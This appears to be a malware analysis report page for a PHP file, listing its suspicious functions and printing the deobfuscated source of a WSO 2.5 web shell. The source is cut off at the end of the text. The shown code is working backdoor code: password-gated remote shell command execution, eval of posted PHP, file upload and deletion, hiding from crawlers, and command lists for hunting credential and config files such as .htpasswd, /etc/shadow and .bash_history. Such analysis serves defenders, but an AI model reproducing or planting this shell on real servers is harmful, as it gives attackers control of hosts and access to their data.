PHP Malware Analysis
base.php
md5: 97a94e18c80f1f713770c697c64928d1
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated, Traces)
- base64_encode (Deobfuscated, Traces)
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- phpinfo (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
- exec (Deobfuscated, Traces)
- passthru (Deobfuscated, Traces)
- shell_exec (Deobfuscated, Traces)
- system (Deobfuscated, Traces)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- " . $_SERVER[\'HTTP_HOST\'] . " - admin (Traces)
URLs
- http://crackfor.me/index.php (Deobfuscated, Traces)
- http://exploit-db.com/search/?action=search&filter_description= (Deobfuscated, Traces)
- http://md5.rednoize.com/?q= (Deobfuscated, Traces)
- https://hashcracking.ru/index.php (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
$a = " error_reporting(E_ALL);\n ini_set(\"display_errors\", 1);\n\n \$auth_pass = \"4297f44b13955235245b2497399d7a93\";\n \$color = \"#df5\";\n \$default_action = 'ff_man';\n \$default_use_ajax = true;\n \$default_charset = 'Windows-1251';\n\n if(!empty(\$_SERVER['HTTP_USER_AGENT'])) {\n \$userAgents = array(\"Google\", \"Slurp\", \"MSNBot\", \"ia_archiver\", \"Yandex\", \"Rambler\");\n if(preg_match('/' . implode('|', \$userAgents) . '/i', \$_SERVER['HTTP_USER_AGENT'])) {\n header('HTTP/1.0 404 Not Found');\n exit;\n }\n }\n\n @ini_set('error_log',NULL);\n @ini_set('log_errors',0);\n @ini_set('max_execution_time',0);\n @set_time_limit(0);\n @define('WSO_VERSION', '2.5');\n\n if(get_magic_quotes_gpc()) {\n function WSOstripslashes(\$array) {\n return is_array(\$array) ? array_map('WSOstripslashes', \$array) : stripslashes(\$array);\n }\n \$_POST = WSOstripslashes(\$_POST);\n \$_COOKIE = WSOstripslashes(\$_COOKIE);\n }\n\n function wsoLogin() {\n die(\"<div align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></div>\");\n }\n\n function WSOsetcookie(\$k, \$v) {\n \$_COOKIE[\$k] = \$v;\n setcookie(\$k, \$v);\n }\n\n if(!empty(\$auth_pass)) {\n if(isset(\$_POST['pass']) && (md5(\$_POST['pass']) == \$auth_pass))\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']), \$auth_pass);\n\n if (!isset(\$_COOKIE[md5(\$_SERVER['HTTP_HOST'])]) || (\$_COOKIE[md5(\$_SERVER['HTTP_HOST'])] != \$auth_pass))\n wsoLogin();\n }\n\n if(strtolower(substr(PHP_OS,0,3)) == \"win\")\n \$os = 'win';\n else\n \$os = 'nix';\n\n \$safe_mode = @ini_get('safe_mode');\n if(!\$safe_mode)\n error_reporting(0);\n\n \$disable_functions = @ini_get('disable_functions');\n \$home_cwd = @getcwd();\n if(isset(\$_POST['c']))\n @chdir(\$_POST['c']);\n \$cwd = @getcwd();\n if(\$os == 'win') {\n \$home_cwd = str_replace(\"\\\\\", \"/\", \$home_cwd);\n \$cwd = str_replace(\"\\\\\", \"/\", \$cwd);\n }\n if(\$cwd[strlen(\$cwd)-1] != '/')\n \$cwd .= '/';\n\n if(!isset(\$_COOKIE[md5(\$_SERVER['HTTP_HOST']) . 'ajax']))\n \$_COOKIE[md5(\$_SERVER['HTTP_HOST']) . 'ajax'] = (bool)\$default_use_ajax;\n\n if(\$os == 'win')\n \$aliases = array(\n \"List Directory\" => \"dir\",\n \"Find index.php in current dir\" => \"dir /s /w /b index.php\",\n \"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\",\n \"Show active connections\" => \"netstat -an\",\n \"Show running services\" => \"net start\",\n \"User accounts\" => \"net user\",\n \"Show computers\" => \"net view\",\n \"ARP Table\" => \"arp -a\",\n \"IP Configuration\" => \"ipconfig /all\"\n );\n else\n \$aliases = array(\n \"List dir\" => \"ls -lha\",\n \"list file attributes on a Linux second extended file system\" => \"lsattr -va\",\n \"show opened ports\" => \"netstat -an | grep -i listen\",\n \"process status\" => \"ps aux\",\n \"Find\" => \"\",\n \"find all suid files\" => \"find / -type f -perm -04000 -ls\",\n \"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\",\n \"find all sgid files\" => \"find / -type f -perm -02000 -ls\",\n \"find sgid files in current dir\" => \"find . -type f -perm -02000 -ls\",\n \"find config.inc.php files\" => \"find / -type f -name config.inc.php\",\n \"find config* files\" => \"find / -type f -name \\\"config*\\\"\",\n \"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\",\n \"find all writable folders and files\" => \"find / -perm -2 -ls\",\n \"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\",\n \"find all service.pwd files\" => \"find / -type f -name service.pwd\",\n \"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\",\n \"find all .htpasswd files\" => \"find / -type f -name .htpasswd\",\n \"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\",\n \"find all .bash_history files\" => \"find / -type f -name .bash_history\",\n \"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\",\n \"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\",\n \"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\",\n \"Locate\" => \"\",\n \"locate httpd.conf files\" => \"locate httpd.conf\",\n \"locate vhosts.conf files\" => \"locate vhosts.conf\",\n \"locate proftpd.conf files\" => \"locate proftpd.conf\",\n \"locate psybnc.conf files\" => \"locate psybnc.conf\",\n \"locate my.conf files\" => \"locate my.conf\",\n \"locate admin.php files\" =>\"locate admin.php\",\n \"locate cfg.php files\" => \"locate cfg.php\",\n \"locate conf.php files\" => \"locate conf.php\",\n \"locate config.dat files\" => \"locate config.dat\",\n \"locate config.php files\" => \"locate config.php\",\n \"locate config.inc files\" => \"locate config.inc\",\n \"locate config.inc.php\" => \"locate config.inc.php\",\n \"locate config.default.php files\" => \"locate config.default.php\",\n \"locate config* files \" => \"locate config\",\n \"locate .conf files\"=>\"locate '.conf'\",\n \"locate .pwd files\" => \"locate '.pwd'\",\n \"locate .sql files\" => \"locate '.sql'\",\n \"locate .htpasswd files\" => \"locate '.htpasswd'\",\n \"locate .bash_history files\" => \"locate '.bash_history'\",\n \"locate .mysql_history files\" => \"locate '.mysql_history'\",\n \"locate .fetchmailrc files\" => \"locate '.fetchmailrc'\",\n \"locate backup files\" => \"locate backup\",\n \"locate dump files\" => \"locate dump\",\n \"locate priv files\" => \"locate priv\"\n );\n\n function wsoHeader() {\n if(empty(\$_POST['charset']))\n \$_POST['charset'] = \$GLOBALS['default_charset'];\n global \$color;\n echo \"<html><head><meta http-equiv='Content-Type' content='text/html; charset=\" . \$_POST['charset'] . \"'><title>\" . \$_SERVER['HTTP_HOST'] . \" - admin </title>\n\t<style>\n\tbody{background-color:#445;color:#e2e2e2;}\n\tbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\n\ttable.info{ color:#fff;background-color:#222; }\n\tspan,h1,a{ color: \$color !important; }\n\tspan{ font-weight: bolder; }\n\th1{ border-left:5px solid \$color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\n\tdiv.content{ padding: 5.5px;margin-left:5.5px;background-color:#444; }\n\ta{ text-decoration:none; }\n\ta:hover{ text-decoration:underline; }\n\t.ml_one_area{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\n\t.area_main{ width:100%;height:300px; }\n\tinput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid \$color; font: 9.5pt Monospace,'Courier New'; }\n\tform{ margin:0px; }\n\t#tools_table_area{ text-align:center; }\n\t.tools_inp_area{ width: 300px }\n\t.main th{text-align:left;background-color:#5e5e5e;}\n\t.main tr:hover{background-color:#5e5e5e}\n\t.l_one_area{background-color:#444}\n\t.l_two_area{background-color:#333}\n\t</style>\n\t<script>\n\t var c_ = '\" . htmlspecialchars(\$GLOBALS['cwd']) . \"';\n\t var a_ = '\" . htmlspecialchars(@\$_POST['a']) .\"'\n\t var charset_ = '\" . htmlspecialchars(@\$_POST['charset']) .\"';\n\t var p1_ = '\" . ((strpos(@\$_POST['p1'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p1'],ENT_QUOTES)) .\"';\n\t var p2_ = '\" . ((strpos(@\$_POST['p2'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p2'],ENT_QUOTES)) .\"';\n\t var p3_ = '\" . ((strpos(@\$_POST['p3'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p3'],ENT_QUOTES)) .\"';\n\t var d = document;\n\t\tfunction set(a,c,p1,p2,p3,charset) {\n\t\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t\t}\n\t\tfunction g(a,c,p1,p2,p3,charset) {\n\t\t\tset(a,c,p1,p2,p3,charset);\n\t\t\td.mf.submit();\n\t\t}\n\t\tfunction a(a,c,p1,p2,p3,charset) {\n\t\t\tset(a,c,p1,p2,p3,charset);\n\t\t\tvar params = 'ajax=true';\n\t\t\tfor(i=0;i<d.mf.elements.length;i++)\n\t\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\n\t\t\tsr('\" . addslashes(\$_SERVER['REQUEST_URI']) .\"', params);\n\t\t}\n\t\tfunction sr(url, params) {\n\t\t\tif (window.XMLHttpRequest)\n\t\t\t\treq = new XMLHttpRequest();\n\t\t\telse if (window.ActiveXObject)\n\t\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\n\t if (req) {\n\t req.onreadystatechange = processReqChange;\n\t req.open('POST', url, true);\n\t req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\n\t req.send(params);\n\t }\n\t\t}\n\t\tfunction processReqChange() {\n\t\t\tif( (req.readyState == 4) )\n\t\t\t\tif(req.status == 200) {\n\t\t\t\t\tvar reg = new RegExp(\\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\\", 'm');\n\t\t\t\t\tvar arr=reg.exec(req.responseText);\n\t\t\t\t\teval(arr[2].substr(0, arr[1]));\n\t\t\t\t} else alert('Request error!');\n\t\t}\n\t</script>\n\t<head><body><div id='main_default' style='display:block;position:absolute;width:100%;background-color:#555;top:0;left:0;'>\n\t<form method=post name=mf style='display:none;'>\n\t<input type=hidden name=a>\n\t<input type=hidden name=c>\n\t<input type=hidden name=p1>\n\t<input type=hidden name=p2>\n\t<input type=hidden name=p3>\n\t<input type=hidden name=charset>\n\t</form>\";\n \$freeSpace = @diskfreespace(\$GLOBALS['cwd']);\n \$totalSpace = @disk_total_space(\$GLOBALS['cwd']);\n \$totalSpace = \$totalSpace?\$totalSpace:1;\n \$release = @php_uname('r');\n \$kernel = @php_uname('s');\n \$explink = 'http://exploit-db.com/search/?action=search&filter_description=';\n if(strpos('Linux', \$kernel) !== false)\n \$explink .= urlencode('Linux Kernel ' . substr(\$release,0,6));\n else\n \$explink .= urlencode(\$kernel . ' ' . substr(\$release,0,3));\n if(!function_exists('posix_getegid')) {\n \$user = @get_current_user();\n \$uid = @getmyuid();\n \$gid = @getmygid();\n \$group = \"?\";\n } else {\n \$uid = @posix_getpwuid(posix_geteuid());\n \$gid = @posix_getgrgid(posix_getegid());\n \$user = \$uid['name'];\n \$uid = \$uid['uid'];\n \$group = \$gid['name'];\n \$gid = \$gid['gid'];\n }\n\n \$cwd_links = '';\n \$path = explode(\"/\", \$GLOBALS['cwd']);\n \$n=count(\$path);\n for(\$i=0; \$i<\$n-1; \$i++) {\n \$cwd_links .= \"<a href='#' onclick='g(\\\"ff_man\\\",\\\"\";\n for(\$j=0; \$j<=\$i; \$j++)\n \$cwd_links .= \$path[\$j].'/';\n \$cwd_links .= \"\\\")'>\".\$path[\$i].\"/</a>\";\n }\n\n \$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');\n \$opt_charsets = '';\n foreach(\$charsets as \$item)\n \$opt_charsets .= '<option value=\"'.\$item.'\" '.(\$_POST['charset']==\$item?'selected':'').'>'.\$item.'</option>';\n\n \$m = array('Sec. Info'=>'SecInfo','Files'=>'ff_man','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');\n if(!empty(\$GLOBALS['auth_pass']))\n \$m['Logout'] = 'Logout';\n \$m['Self remove'] = 'SelfRemove';\n \$menu = '';\n foreach(\$m as \$k => \$v)\n \$menu .= '<th width=\"'.(int)(100/count(\$m)).'%\">[ <a href=\"#\" onclick=\"g(\\''.\$v.'\\',null,\\'\\',\\'\\',\\'\\')\">'.\$k.'</a> ]</th>';\n\n \$drives = \"\";\n if(\$GLOBALS['os'] == 'win') {\n foreach(range('c','z') as \$drive)\n if(is_dir(\$drive.':\\\\'))\n \$drives .= '<a href=\"#\" onclick=\"g(\\'ff_man\\',\\''.\$drive.':/\\')\">[ '.\$drive.' ]</a> ';\n }\n echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . (\$GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'\n . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href=\"' . \$explink . '\" target=_blank>[exploit-db.com]</a></nobr><br>' . \$uid . ' ( ' . \$user . ' ) <span>Group:</span> ' . \$gid . ' ( ' . \$group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . (\$GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>')\n . ' <a href=# onclick=\"g(\\'Php\\',null,\\'\\',\\'info\\')\">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize(\$totalSpace) . ' <span>Free:</span> ' . wsoViewSize(\$freeSpace) . ' ('. (int) (\$freeSpace/\$totalSpace*100) . '%)<br>' . \$cwd_links . ' '. wsoPermsColor(\$GLOBALS['cwd']) . ' <a href=# onclick=\"g(\\'ff_man\\',\\'' . \$GLOBALS['home_cwd'] . '\\',\\'\\',\\'\\',\\'\\')\">[ home ]</a><br>' . \$drives . '</td>'\n . '<td width=1 align=right><nobr><select onchange=\"g(null,null,null,null,null,this.value)\"><optgroup label=\"Page charset\">' . \$opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @\$_SERVER[\"SERVER_ADDR\"] . '<br><span>Client IP:</span><br>' . \$_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'\n . '<table style=\"border-top:2px solid #333;\" cellpadding=3 cellspacing=0 width=100%><tr>' . \$menu . '</tr></table><div style=\"margin:5\">';\n }\n\n function wsoFooter() {\n \$is_writable = is_writable(\$GLOBALS['cwd'])?\" <font color='green'></font>\":\"Yes<font color=red>(Not)</font>\";\n echo \"\n\t</div>\n\t<table class=info id=tools_table_area cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\n\t\t<tr>\n\t\t\t<td><form onsubmit='g(null,this.c.value,\\\"\\\");return false;'><span>ch:</span><br><input class='tools_inp_area' type=text name=c value='\" . htmlspecialchars(\$GLOBALS['cwd']) .\"'><input type=submit value='>>'></form></td>\n\t\t\t<td><form onsubmit=\\\"g('ff_tools',null,this.f.value);return false;\\\"><span>Read file:</span><br><input class='tools_inp_area' type=text name=f><input type=submit value='>>'></form></td>\n\t\t</tr><tr>\n\t\t\t<td><form onsubmit=\\\"g('ff_man',null,'mkdir',this.d.value);return false;\\\"><span>mdir:</span>\$is_writable<br><input class='tools_inp_area' type=text name=d><input type=submit value='>>'></form></td>\n\t\t\t<td><form onsubmit=\\\"g('ff_tools',null,this.f.value,'mkfile');return false;\\\"><span>Mfile:</span>\$is_writable<br><input class='tools_inp_area' type=text name=f><input type=submit value='>>'></form></td>\n\t\t</tr><tr>\n\t\t\t<td><form onsubmit=\\\"g('cns',null,this.c.value);return false;\\\"><span>ex:</span><br><input class='tools_inp_area' type=text name=c value=''><input type=submit value='>>'></form></td>\n\t\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\n\t\t\t<input type=hidden name=a value='ff_man'>\n\t\t\t<input type=hidden name=c value='\" . \$GLOBALS['cwd'] .\"'>\n\t\t\t<input type=hidden name=p1 value='uploadFile'>\n\t\t\t<input type=hidden name=charset value='\" . (isset(\$_POST['charset'])?\$_POST['charset']:'') . \"'>\n\t\t\t<span>Upload file:</span>\$is_writable<br><input class='tools_inp_area' type=file name=f><input type=submit value='>>'></form><br ></td>\n\t\t</tr></table></div></body></html>\";\n }\n\n if (!function_exists(\"posix_getpwuid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {\n function posix_getpwuid(\$p) {return false;} }\n if (!function_exists(\"posix_getgrgid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {\n function posix_getgrgid(\$p) {return false;} }\n\n function wsoEx(\$in) {\n \$out = '';\n if (function_exists('exec')) {\n @exec(\$in,\$out);\n \$out = @join(\"\\n\",\$out);\n } elseif (function_exists('passthru')) {\n ob_start();\n @passthru(\$in);\n \$out = ob_get_clean();\n } elseif (function_exists('system')) {\n ob_start();\n @system(\$in);\n \$out = ob_get_clean();\n } elseif (function_exists('shell_exec')) {\n \$out = shell_exec(\$in);\n } elseif (is_resource(\$f = @popen(\$in,\"r\"))) {\n \$out = \"\";\n while(!@feof(\$f))\n \$out .= fread(\$f,1024);\n pclose(\$f);\n }\n return \$out;\n }\n\n function wsoViewSize(\$s) {\n if (is_int(\$s))\n \$s = sprintf(\"%u\", \$s);\n\n if(\$s >= 1073741824)\n return sprintf('%1.2f', \$s / 1073741824 ). ' GB';\n elseif(\$s >= 1048576)\n return sprintf('%1.2f', \$s / 1048576 ) . ' MB';\n elseif(\$s >= 1024)\n return sprintf('%1.2f', \$s / 1024 ) . ' KB';\n else\n return \$s . ' B';\n }\n\n function wsoPerms(\$p) {\n if ((\$p & 0xC000) == 0xC000)\$i = 's';\n elseif ((\$p & 0xA000) == 0xA000)\$i = 'l';\n elseif ((\$p & 0x8000) == 0x8000)\$i = '-';\n elseif ((\$p & 0x6000) == 0x6000)\$i = 'b';\n elseif ((\$p & 0x4000) == 0x4000)\$i = 'd';\n elseif ((\$p & 0x2000) == 0x2000)\$i = 'c';\n elseif ((\$p & 0x1000) == 0x1000)\$i = 'p';\n else \$i = 'u';\n \$i .= ((\$p & 0x0100) ? 'r' : '-');\n \$i .= ((\$p & 0x0080) ? 'w' : '-');\n \$i .= ((\$p & 0x0040) ? ((\$p & 0x0800) ? 's' : 'x' ) : ((\$p & 0x0800) ? 'S' : '-'));\n \$i .= ((\$p & 0x0020) ? 'r' : '-');\n \$i .= ((\$p & 0x0010) ? 'w' : '-');\n \$i .= ((\$p & 0x0008) ? ((\$p & 0x0400) ? 's' : 'x' ) : ((\$p & 0x0400) ? 'S' : '-'));\n \$i .= ((\$p & 0x0004) ? 'r' : '-');\n \$i .= ((\$p & 0x0002) ? 'w' : '-');\n \$i .= ((\$p & 0x0001) ? ((\$p & 0x0200) ? 't' : 'x' ) : ((\$p & 0x0200) ? 'T' : '-'));\n return \$i;\n }\n\n function wsoPermsColor(\$f) {\n if (!@is_readable(\$f))\n return '<font color=#FF0000>' . wsoPerms(@fileperms(\$f)) . '</font>';\n elseif (!@is_writable(\$f))\n return '<font color=white>' . wsoPerms(@fileperms(\$f)) . '</font>';\n else\n return '<font color=#25ff00>' . wsoPerms(@fileperms(\$f)) . '</font>';\n }\n\n function wsoScandir(\$dir) {\n if(function_exists(\"scandir\")) {\n return scandir(\$dir);\n } else {\n \$dh = opendir(\$dir);\n while (false !== (\$filename = readdir(\$dh)))\n \$files[] = \$filename;\n return \$files;\n }\n }\n\n function wsoWhich(\$p) {\n \$path = wsoEx('which ' . \$p);\n if(!empty(\$path))\n return \$path;\n return false;\n }\n\n function actionSecInfo() {\n wsoHeader();\n echo '<h1>Server security information</h1><div class=content>';\n function wsoSecParam(\$n, \$v) {\n \$v = trim(\$v);\n if(\$v) {\n echo '<span>' . \$n . ': </span>';\n if(strpos(\$v, \"\\n\") === false)\n echo \$v . '<br>';\n else\n echo '<pre class=ml_one_area>' . \$v . '</pre>';\n }\n }\n\n wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));\n if(function_exists('apache_get_modules'))\n wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));\n wsoSecParam('Disabled PHP Functions', \$GLOBALS['disable_functions']?\$GLOBALS['disable_functions']:'none');\n wsoSecParam('Open base dir', @ini_get('open_basedir'));\n wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));\n wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));\n wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');\n \$temp=array();\n if(function_exists('mysql_get_client_info'))\n \$temp[] = \"MySql (\".mysql_get_client_info().\")\";\n if(function_exists('mssql_connect'))\n \$temp[] = \"MSSQL\";\n if(function_exists('pg_connect'))\n \$temp[] = \"PostgreSQL\";\n if(function_exists('oci_connect'))\n \$temp[] = \"Oracle\";\n wsoSecParam('Supported databases', implode(', ', \$temp));\n echo '<br>';\n\n if(\$GLOBALS['os'] == 'nix') {\n wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?\"yes <a href='#' onclick='g(\\\"ff_tools\\\", \\\"/etc/\\\", \\\"passwd\\\")'>[view]</a>\":'no');\n wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?\"yes <a href='#' onclick='g(\\\"ff_tools\\\", \\\"/etc/\\\", \\\"shadow\\\")'>[view]</a>\":'no');\n wsoSecParam('OS version', @file_get_contents('/proc/version'));\n wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));\n if(!\$GLOBALS['safe_mode']) {\n \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\n \$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');\n \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\n echo '<br>';\n \$temp=array();\n foreach (\$userful as \$item)\n if(wsoWhich(\$item))\n \$temp[] = \$item;\n wsoSecParam('Userful', implode(', ',\$temp));\n \$temp=array();\n foreach (\$danger as \$item)\n if(wsoWhich(\$item))\n \$temp[] = \$item;\n wsoSecParam('Danger', implode(', ',\$temp));\n \$temp=array();\n foreach (\$downloaders as \$item)\n if(wsoWhich(\$item))\n \$temp[] = \$item;\n wsoSecParam('Downloaders', implode(', ',\$temp));\n echo '<br/>';\n wsoSecParam('HDD space', wsoEx('df -h'));\n wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));\n echo '<br/><span>posix_getpwuid (\"Read\" /etc/passwd)</span><table><form onsubmit=\\'g(null,null,\"5\",this.param1.value,this.param2.value);return false;\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=\">>\"></form>';\n if (isset (\$_POST['p2'], \$_POST['p3']) && is_numeric(\$_POST['p2']) && is_numeric(\$_POST['p3'])) {\n \$temp = \"\";\n for(;\$_POST['p2'] <= \$_POST['p3'];\$_POST['p2']++) {\n \$uid = @posix_getpwuid(\$_POST['p2']);\n if (\$uid)\n \$temp .= join(':',\$uid).\"\\n\";\n }\n echo '<br/>';\n wsoSecParam('Users', \$temp);\n }\n }\n } else {\n wsoSecParam('OS Version',wsoEx('ver'));\n wsoSecParam('Account Settings',wsoEx('net accounts'));\n wsoSecParam('User Accounts',wsoEx('net user'));\n }\n echo '</div>';\n wsoFooter();\n }\n\n function actionPhp() {\n if(isset(\$_POST['ajax'])) {\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']) . 'ajax', true);\n ob_start();\n eval(\$_POST['p1']);\n \$temp = \"document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='\" . addcslashes(htmlspecialchars(ob_get_clean()), \"\\n\\r\\t\\\\'\\0\") . \"';\\n\";\n echo strlen(\$temp), \"\\n\", \$temp;\n exit;\n }\n if(empty(\$_POST['ajax']) && !empty(\$_POST['p1']))\n WSOsetcookie(md5(\$_SERVER['HTTP_HOST']) . 'ajax', 0);\n\n wsoHeader();\n if(isset(\$_POST['p2']) && (\$_POST['p2'] == 'info')) {\n echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';\n ob_start();\n phpinfo();\n \$tmp = ob_get_clean();\n \$tmp = preg_replace(array (\n '!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU',\n '!td, th {(.*)}!msiU',\n '!<img[^>]+>!msiU',\n ), array (\n '',\n '.e, .v, .h, .h th {\$1}',\n ''\n ), \$tmp);\n echo str_replace('<h1','<h2', \$tmp) .'</div><br>';\n }\n echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit=\"if(this.ajax.checked){a(\\'Php\\',null,this.code.value);}else{g(\\'Php\\',null,this.code.value,\\'\\');}return false;\"><textarea name=code class=area_main id=PhpCode>'.(!empty(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'</textarea><input type=submit value=Eval style=\"margin-top:5px\">';\n echo ' <input type=checkbox name=ajax value=1 '.(\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style=\"'.(empty(\$_POST['p1'])?'display:none;':'').'margin-top:5px;\" class=ml_one_area>';\n if(!empty(\$_POST['p1'])) {\n ob_start();\n eval(\$_POST['p1']);\n echo htmlspecialchars(ob_get_clean());\n }\n echo '</pre></div>';\n wsoFooter();\n }\n\n function actionff_man() {\n if (!empty (\$_COOKIE['f']))\n \$_COOKIE['f'] = @unserialize(\$_COOKIE['f']);\n\n if(!empty(\$_POST['p1'])) {\n switch(\$_POST['p1']) {\n case 'uploadFile':\n if(!@move_uploaded_file(\$_FILES['f']['tmp_name'], \$_FILES['f']['name']))\n echo \"Can't upload file!\";\n break;\n case 'mkdir':\n if(!@mkdir(\$_POST['p2']))\n echo \"Can't create new dir\";\n break;\n case 'delete':\n function deleteDir(\$path) {\n \$path = (substr(\$path,-1)=='/') ? \$path:\$path.'/';\n \$dh = opendir(\$path);\n while ( (\$item = readdir(\$dh) ) !== false) {\n \$item = \$path.\$item;\n if ( (basename(\$item) == \"..\") || (basename(\$item) == \".\") )\n continue;\n \$type = filetype(\$item);\n if (\$type == \"dir\")\n deleteDir(\$item);\n else\n @unlink(\$item);\n }\n closedir(\$dh);\n @rmdir(\$path);\n }\n if(is_array(@\$_POST['f']))\n foreach(\$_POST['f'] as \$f) {\n if(\$f == '..')\n continue;\n \$f = urldecode(\$f);\n if(is_dir(\$f))\n deleteDir(\$f);\n else\n @unlink(\$f);\n }\n break;\n case 'paste':\n if(\$_COOKIE['act'] == 'copy') {\n function copy_paste(\$c,\$s,\$d){\n if(is_dir(\$c.\$s)){\n mkdir(\$d.\$s);\n \$h = @opendir(\$c.\$s);\n while ((\$f = @readdir(\$h)) !== false)\n if ((\$f != \".\") and (\$f != \"..\"))\n copy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\n } elseif(is_file(\$c.\$s))\n @copy(\$c.\$s, \$d.\$s);\n }\n foreach(\$_COOKIE['f'] as \$f)\n copy_paste(\$_COOKIE['c'],\$f, \$GLOBALS['cwd']);\n } elseif(\$_COOKIE['act'] == 'move') {\n function move_paste(\$c,\$s,\$d){\n if(is_dir(\$c.\$s)){\n mkdir(\$d.\$s);\n \$h = @opendir(\$c.\$s);\n while ((\$f = @readdir(\$h)) !== false)\n if ((\$f != \".\") and (\$f != \"..\"))\n copy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\n } elseif(@is_file(\$c.\$s))\n @copy(\$c.\$s, \$d.\$s);\n }\n foreach(\$_COOKIE['f'] as \$f)\n @rename(\$_COOKIE['c'].\$f, \$GLOBALS['cwd'].\$f);\n } elseif(\$_COOKIE['act'] == 'zip') {\n if(class_exists('ZipArchive')) {\n \$zip = new ZipArchive();\n if (\$zip->open(\$_POST['p2'], 1)) {\n chdir(\$_COOKIE['c']);\n foreach(\$_COOKIE['f'] as \$f) {\n if(\$f == '..')\n continue;\n if(@is_file(\$_COOKIE['c'].\$f))\n \$zip->addFile(\$_COOKIE['c'].\$f, \$f);\n elseif(@is_dir(\$_COOKIE['c'].\$f)) {\n \$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$f.'/', FilesystemIterator::SKIP_DOTS));\n foreach (\$iterator as \$key=>\$value) {\n \$zip->addFile(realpath(\$key), \$key);\n }\n }\n }\n chdir(\$GLOBALS['cwd']);\n \$zip->close();\n }\n }\n } elseif(\$_COOKIE['act'] == 'unzip') {\n 